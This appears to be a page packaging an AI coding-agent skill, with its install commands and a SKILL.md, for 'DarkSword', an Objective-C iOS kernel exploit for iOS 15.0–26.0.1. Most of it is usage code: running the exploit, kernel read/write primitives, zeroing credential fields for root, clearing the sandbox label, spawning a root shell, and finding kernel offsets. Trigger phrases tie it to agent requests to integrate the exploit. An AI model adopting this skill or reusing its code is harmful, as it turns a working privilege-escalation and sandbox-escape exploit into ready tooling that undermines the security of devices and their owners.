install
source · Clone the upstream repo
git clone https://github.com/Aradotso/trending-skills
Claude Code · Install into ~/.claude/skills/
T=$(mktemp -d) && git clone --depth=1 https://github.com/Aradotso/trending-skills "$T" && mkdir -p ~/.claude/skills && cp -r "$T/skills/darksword-kexploit" ~/.claude/skills/aradotso-trending-skills-darksword-kexploit && rm -rf "$T"
manifest:
skills/darksword-kexploit/SKILL.mdsource content
--- name: darksword-kexploit description: iOS kernel exploit (iOS 15.0–26.0.1) reimplemented in Objective-C, providing kernel read/write primitives and privilege escalation on supported devices. triggers: - integrate darksword kernel exploit - use DarkSword kexploit in my iOS project - kernel read write primitives iOS - iOS privilege escalation exploit Objective-C - kernel exploit offsets iOS 15 - implement kernel exploit in Objective-C - darksword exploit setup and usage - iOS jailbreak kernel exploit integration --- # DarkSword Kernel Exploit > Skill by [ara.so](https://ara.so) — Daily 2026 Skills collection. DarkSword is a kernel exploit for iOS 15.0–26.0.1, reimplemented in Objective-C. It provides kernel-level read/write primitives and privilege escalation capabilities. Offsets are currently hardcoded for iOS 15.x; extending to other versions requires supplying correct kernel offsets. --- ## What It Does - Exploits a kernel vulnerability present in iOS 15.0 through 26.0.1 - Provides arbitrary kernel memory read (`kread`) and write (`kwrite`) primitives - Enables privilege escalation (setuid 0 / unsandboxing) - Written in Objective-C for easy integration into iOS tooling, jailbreaks, or research projects --- ## Installation ### Adding to an Xcode Project 1. Clone the repository: ```bash git clone https://github.com/opa334/darksword-kexploit.git
-
Drag the source files into your Xcode project target.
-
Ensure your project's build settings include:
- Deployment Target: iOS 15.0+
- ARC: Enabled
- Relevant entitlements if running on-device (codesign accordingly)
-
Import the main header:
#import "DarkSword.h"
Theos/Makefile Integration
ARCHS = arm64 arm64e TARGET = iphone:clang:latest:15.0 include $(THEOS)/makefiles/common.mk TOOL_NAME = myexploit myexploit_FILES = main.m DarkSword.m exploit_helpers.m myexploit_CFLAGS = -fobjc-arc myexploit_LDFLAGS = -lSystem include $(THEOS_MAKE_PATH)/tool.mk
Key API / Usage Patterns
1. Running the Exploit
#import "DarkSword.h" int main(int argc, char *argv[]) { @autoreleasepool { DarkSword *exploit = [[DarkSword alloc] init]; BOOL success = [exploit run]; if (!success) { NSLog(@"[!] Exploit failed."); return 1; } NSLog(@"[+] Exploit succeeded. Kernel task port: %d", exploit.kernelTaskPort); } return 0; }
2. Kernel Read Primitive
#import "DarkSword.h" // Read 8 bytes (uint64_t) from a kernel address uint64_t ReadKernel64(DarkSword *exploit, uint64_t address) { uint64_t value = 0; [exploit kread:address into:&value size:sizeof(uint64_t)]; return value; } // Example: read kernel slide from a known pointer uint64_t kernelBase = ReadKernel64(exploit, KNOWN_KERNEL_POINTER_OFFSET); NSLog(@"[+] Kernel base: 0x%llx", kernelBase);
3. Kernel Write Primitive
#import "DarkSword.h" // Write 8 bytes to a kernel address void WriteKernel64(DarkSword *exploit, uint64_t address, uint64_t value) { [exploit kwrite:address from:&value size:sizeof(uint64_t)]; } // Example: patch a kernel flag uint64_t targetAddr = kernelBase + SOME_OFFSET; WriteKernel64(exploit, targetAddr, 0x1); NSLog(@"[+] Kernel flag patched at 0x%llx", targetAddr);
4. Privilege Escalation
#import "DarkSword.h" #import <unistd.h> void escalatePrivileges(DarkSword *exploit) { // Get current task's proc pointer from kernel uint64_t currentProc = [exploit currentProc]; // Overwrite uid/gid fields to 0 (root) uint64_t ucredOffset = [exploit ucredOffsetForProc:currentProc]; uint64_t ucred = ReadKernel64(exploit, currentProc + ucredOffset); // Zero out cr_uid, cr_gid, cr_ruid, cr_rgid for (int i = 0; i < 4; i++) { WriteKernel64(exploit, ucred + (i * 4), 0x0); } NSLog(@"[+] UID after escalation: %d", getuid()); // Should print 0 }
5. Providing Custom Kernel Offsets
Since offsets are hardcoded for iOS 15.x, you must supply correct offsets for other versions:
#import "DarkSword.h" // Create a KernelOffsets struct (check DarkSword.h for definition) KernelOffsets offsets = { .proc_ucred = 0xD8, // offsetof(proc, p_ucred) for your iOS version .ucred_cr_uid = 0x18, .task_itk_self = 0xD8, .kernelslide = 0x0, // determined at runtime // ... fill remaining fields per iOS version }; DarkSword *exploit = [[DarkSword alloc] initWithOffsets:offsets]; BOOL success = [exploit run];
Finding Offsets
Use
jtool2iometa# Extract and analyze kernelcache img4tool -e kernelcache.img4 -o kernelcache.dec jtool2 --analyze kernelcache.dec # Find struct offsets iometa -A kernelcache.dec | grep "proc\|ucred\|task"
Configuration Reference
| Field | Description | Default (iOS 15.x) |
|---|---|---|
| Offset of | Hardcoded |
| Offset of | Hardcoded |
| Offset of | Hardcoded |
| KASLR slide (computed at runtime) | |
| Offset of | Hardcoded |
Common Patterns
Check iOS Version Before Running
#import <UIKit/UIKit.h> #import "DarkSword.h" BOOL isSupportedVersion(void) { NSOperatingSystemVersion minVer = {15, 0, 0}; NSOperatingSystemVersion maxVer = {26, 0, 1}; NSProcessInfo *info = [NSProcessInfo processInfo]; return [info isOperatingSystemAtLeastVersion:minVer] && ![info isOperatingSystemAtLeastVersion:(NSOperatingSystemVersion){26, 0, 2}]; } int main(int argc, char *argv[]) { @autoreleasepool { if (!isSupportedVersion()) { NSLog(@"[!] Unsupported iOS version."); return 1; } DarkSword *exploit = [[DarkSword alloc] init]; [exploit run]; } return 0; }
Unsandboxing the Current Process
void unsandbox(DarkSword *exploit) { uint64_t proc = [exploit currentProc]; uint64_t ucred = ReadKernel64(exploit, proc + [exploit ucredOffsetForProc:proc]); // Clear sandbox label pointer (cr_label offset varies by version) uint64_t crLabelOffset = 0x78; // iOS 15.x example WriteKernel64(exploit, ucred + crLabelOffset, 0x0); NSLog(@"[+] Sandbox removed for current process"); }
Spawning a Root Shell
#import <spawn.h> void spawnRootShell(DarkSword *exploit) { escalatePrivileges(exploit); unsandbox(exploit); pid_t pid; char *argv[] = { "/bin/sh", NULL }; char *envp[] = { "PATH=/usr/bin:/bin:/usr/sbin:/sbin", NULL }; posix_spawn(&pid, "/bin/sh", NULL, NULL, argv, envp); waitpid(pid, NULL, 0); }
Troubleshooting
Exploit Returns NO / Fails Silently
- Confirm device is running a supported iOS version (15.0–26.0.1).
- Ensure you're running on a physical device — the exploit does not work in the Simulator.
- Check kernel offsets match the exact iOS build (minor build differences matter).
- Review Xcode console for NSLog output indicating which stage failed.
Kernel Panic on Write
- The target address is likely invalid or unmapped. Validate with a
first.kread - Ensure KASLR slide is correctly computed before using slid addresses.
Offsets Wrong for My iOS Version
- Use
orjtool2 --analyze
on the specific kernelcache build.iometa - iOS minor/patch versions can change struct layouts — always verify against the exact build number.
Build Errors: Missing Types
- Ensure you include both
andDarkSword.h
in files that useexploit_helpers.h
.KernelOffsets - Confirm ARC is enabled (
).-fobjc-arc
Codesigning / Entitlements
- On-device execution requires a valid provisioning profile.
- For full kernel access, the binary may need
andcom.apple.private.security.no-sandbox
entitlements (only grantable via jailbreak or developer bypass).task_for_pid-allow
Project Structure
darksword-kexploit/ ├── DarkSword.h # Main public header (API surface) ├── DarkSword.m # Core exploit implementation ├── exploit_helpers.h # Utility types and macros ├── exploit_helpers.m # Helper functions (kread/kwrite wrappers) ├── offsets.h # Hardcoded iOS 15.x kernel offsets └── main.m # Example entry point
References
- opa334/darksword-kexploit on GitHub
- jtool2 — kernelcache analysis
- iometa — IOKit class enumeration and offset finding
- checkra1n / palera1n — reference jailbreak implementations